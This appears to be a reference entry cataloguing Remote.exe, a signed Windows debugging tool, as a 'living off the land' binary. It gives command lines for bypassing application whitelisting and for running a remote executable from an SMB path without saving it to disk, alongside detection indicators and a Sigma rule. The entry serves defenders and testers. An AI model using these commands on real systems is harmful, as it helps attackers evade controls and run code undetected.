Remote.exe

Debugging tool included with Windows Debugging Tools

Paths

• C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
• C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe

Commands

AWL Bypass

Spawns specified executable as a child process of remote.exe

Use case: Executes a process under a trusted Microsoft signed binary

Privileges: User

Remote.exe /s {PATH:.exe} anythinghere

Execute

Spawns specified executable as a child process of remote.exe

Use case: Executes a process under a trusted Microsoft signed binary

Privileges: User

Remote.exe /s {PATH:.exe} anythinghere

Execute

Run a remote file

Use case: Executing a remote binary without saving file to disk

Privileges: User

Remote.exe /s {PATH_SMB:.exe} anythinghere

Detection

• IOC: remote.exe process spawns
• Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml

Resources

• https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/